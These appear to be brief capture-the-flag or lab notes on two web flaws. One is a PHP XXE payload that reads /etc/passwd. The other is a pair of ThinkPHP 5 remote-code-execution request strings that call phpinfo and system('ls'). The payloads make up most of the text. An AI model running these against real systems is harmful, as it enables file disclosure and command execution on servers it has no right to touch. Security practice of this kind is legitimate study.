1.[PHP]XXE
After libxml2.9.0, default does not resolve external entities, resulting in vulnerabilities XXE gradually disappearing
dom.php, SimpleXMLElement.php, simplexml_load_string.php vulnerability can be triggered XXE
Burp with capture, addition of modified rearward payload
payload:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<root>
<name>&xxe;</name>
</root>
2.[ThinkPHP]5-Rce
Thinkphp5 5.0.22 / 5.1.29 remote code execution vulnerability:
Directly behind the increase in website, found the flag in phpinfo
/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls